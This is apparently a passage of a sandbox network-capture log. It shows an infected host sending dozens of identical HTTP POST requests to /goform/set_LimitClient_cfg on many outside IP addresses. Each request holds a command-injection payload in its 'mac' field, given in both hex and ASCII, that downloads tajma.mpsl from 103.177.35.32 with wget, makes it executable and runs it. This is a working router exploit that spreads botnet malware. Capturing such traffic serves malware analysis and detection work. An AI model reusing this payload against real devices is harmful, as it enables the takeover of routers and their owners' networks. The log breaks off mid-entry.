                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2746192.168.2.234613214.243.91.1158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477551937 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2747192.168.2.2344582120.59.68.2278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477567911 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2748192.168.2.236076493.40.242.338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477581024 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2749192.168.2.2338336159.140.187.1098080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477607965 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2750192.168.2.2358368194.213.89.1458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477612972 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2751192.168.2.2350368131.61.87.1558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477632046 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2752192.168.2.234239476.194.68.1528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477818966 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2753192.168.2.233868042.154.3.338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477861881 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2754192.168.2.2358420223.166.195.968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477880955 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2755192.168.2.234132657.121.248.1968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477881908 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2756192.168.2.2332838105.168.199.978080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477902889 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2757192.168.2.2339590205.111.243.578080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478005886 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2758192.168.2.234197638.79.242.278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478055954 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2759192.168.2.235402264.180.66.1708080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478070974 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2760192.168.2.2334212198.186.98.688080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478105068 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2761192.168.2.234552494.234.195.2288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478121042 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2762192.168.2.233346027.79.3.678080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478132010 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2763192.168.2.233699075.234.202.1248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478141069 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2764192.168.2.2359990203.30.19.1878080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478154898 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2765192.168.2.2349160142.28.221.1678080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478171110 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2766192.168.2.2353912114.229.175.98080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478194952 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2767192.168.2.235531414.141.4.1818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478209972 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2768192.168.2.2348968216.209.240.1698080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.478224993 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
